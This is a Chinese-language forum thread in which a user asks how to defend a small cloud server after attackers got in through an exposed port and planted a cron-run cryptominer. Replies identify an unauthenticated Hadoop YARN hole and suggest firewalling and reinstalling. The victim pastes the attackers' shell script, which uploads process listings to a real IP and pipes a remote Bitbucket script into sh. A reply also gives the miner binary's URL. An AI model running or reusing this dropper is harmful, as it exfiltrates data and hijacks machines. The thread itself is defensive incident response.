攻击别人服务器是怎么搞的啊

2018-10-13 22:52:36 +08:00
 choice4

我都关了 root 登录 关闭了密码登录只允许秘钥登录 最后好像还是让某位大哥从 8088 进去了好像? cpu 100%(就是一个阿里云的学生机而已,这点性能也要搞我) crontab 里面给我加了个每秒执行的 wget ,

问问老哥们怎么防啊 。我去阿里云安全组设置规则端口地址段访问的时候说最多支持一组授权对象(离开家门之后网络就变了想有多个 ip 可以访问这个阿里云机器)。没搞好。 然后现在就是直接 firewall 把 8088 关了。20 分钟了还没出事。没关端口之前是 10~15 分钟 就会出问题。

这个 firewall 和安全组能特定多个 ip 访问端口吗? 还有啊 有没有办法把这个搞我的地址弄出来啊 然后顺便加个排除他 ip 之类的

9227 次点击
所在节点    Linux
34 条回复
WordTian
2018-10-13 22:55:30 +08:00
cpu 百分百?那估计是挖矿脚本

估计你在 8088 端口启的服务有漏洞
choice4
2018-10-13 22:59:28 +08:00
#!/bin/bash

ps ax --sort=-pcpu > /tmp/tmp2.txt
#netstat -antp > /tmp/tmp2.txt
#crontab -l > /tmp/tmp2.txt
#ps -eo uid,pid,ppid,stime,%cpu,cmd --sort=-%cpu |grep -v STIME| head>/tmp/tmp2.txt
#top -c -n 1 -b > /tmp/tmp.txt
curl -F "file=@/tmp/tmp2.txt" http://46.249.38.186/rep.php
rm -rf /tmp/tmp2.txt

LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi

if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
$LDR https://bitbucket.org/okjh6t37/mygit/raw/master/zz.sh | sh
else
pwd
fi


这可能是那个脚本
choice4
2018-10-13 23:00:30 +08:00
@WordTian 你好 请问有办法限制 ip 吗? 我搞了一会搞不好 直接关了 8088 我这边好多也不方便了
choice4
2018-10-13 23:01:16 +08:00
以前没在意过这些 安全组都是直接地址段访问然后 0.0.0.0/0
这会有点难受了
ech0x
2018-10-13 23:03:09 +08:00
你是要跑什么东西?还是去好好补补安全常识吧,直接 0.0.0.0/0 也是心大。
t6attack
2018-10-13 23:07:38 +08:00
有漏洞就抓紧补上。留着漏洞,只限 IP,这是什么操作?
watzds
2018-10-13 23:20:51 +08:00
哈哈,这点性能也要搞我

两年多前我遇到这种情况是因为 redis 没密码,看看有什么漏洞
WordTian
2018-10-13 23:29:31 +08:00
https://bitbucket.org/okjh6t37/mygit/raw/master/x_64
这个是实际执行的二进制文件,看着像门罗币的挖矿病毒 xmrig

我之前开 aria2c 没设密钥的时候也中过一回类似的东西,你还是排查下对外开启的服务吧,看看有哪个可能有漏洞的,话说你 8088 开的什么服务啊

限制 ip 的话,你先看看安全组有没相关的设置吧,有的话用那个就行。
如果有经验的话,可以用 iptables。不行的话用 /etc 下的 host.allow,host.deny 也可以试试
choice4
2018-10-13 23:31:43 +08:00
@WordTian 8088 跑着一个 yarn 我刚才查到是 nodemanager 的漏洞 最开始好像是个俄罗斯黑客发现并利用的漏洞, 目前还在继续找解决办法
choice4
2018-10-13 23:32:13 +08:00
@watzds 确实好像是一个服务有漏洞
zhexi
2018-10-14 00:25:06 +08:00
iptables 或者 firewall 屏蔽不得行?
biglee0304
2018-10-14 00:41:20 +08:00
看着的确是挖矿的
Greenm
2018-10-14 01:40:02 +08:00
Hadoop yarn 吧,这个应该是未添加认证,可以直接执行的,加个口令或者限制在内网。
h3lica
2018-10-14 02:05:47 +08:00
一般都是脚本刷漏洞的…别人也不是专门入侵你一个…
LeonKennedy
2018-10-14 08:42:02 +08:00
曾经我每次 ssh 登陆上,好几千的失败登陆。后来我改了端口号,清净了
likuku
2018-10-14 10:32:08 +08:00
@choice4 不是对外公有服务,那就 ssh is 端口外都关闭,需要访问其它服务,装平装 openvpn,或者 ssh 端口映射到本地。
choice4
2018-10-14 11:22:19 +08:00
@likuku 就是说 不管这些人是通过什么方式入侵 最后都是通过 ssh 吗 ssh 端口我倒是没改 只是禁了 root 和密码登录, 我搜索到的是说我 8088 跑的东西有一些安全机制的问题 ,后台的版本修复了 。但是我用的那个版本较低,还是有这个漏洞的。 老哥我已经好几个问题看见你帮我了 /笑哭 多谢多谢
likuku
2018-10-14 11:27:18 +08:00
@choice4 ssh 端口无所谓,只允许 key 认证 + 禁止 root 登陆就行了(个人观点),#18 我意思是 ss 之外其它端口干脆都禁掉,需要用的话,利用 openvpn (当然要仅对允许的访客 IP 开端口,当然要使用证书连接),或者 ssh 端口映射本地。

另外,系统已经被爆(橘),受到污染的情况下,最好是备份好数据和能信任的干净配置信息前提下,干掉系统重装+更新+防火期 了事。
choice4
2018-10-14 11:31:47 +08:00
@Greenm 是 yarn 加个口令是什么操作命令行还是配置文件。我搜到一个关于这个的配置文件 不过 property 里面好像有些变量 在对号
choice4
2018-10-14 11:31:58 +08:00
@likuku

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/497404

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX